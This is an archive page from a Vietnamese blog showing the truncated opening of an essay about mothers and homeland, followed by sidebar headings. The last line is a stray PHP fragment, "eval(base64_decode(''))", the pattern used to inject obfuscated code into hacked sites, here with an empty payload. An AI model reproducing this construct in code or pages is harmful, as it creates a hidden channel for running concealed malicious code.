Archive for May 10th, 2012

Mẹ và Quê Hương

Mẹ và Quê Hương

Một danh ngôn mà chúng ta thường nghe :"Thế giới có rất nhiều kỳ quan, nhưng kỳ quan tuyệt vời và vĩ đại nhất vẫn là trái tim người mẹ". Thật vậy, bao nhiêu thơ viết về mẹ cũng không đủ, bao nhiêu nhạc hát về mẹ cũng không vừa. B

05.10.2012 | Ký-Truyện-Tùy Bút |

4 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>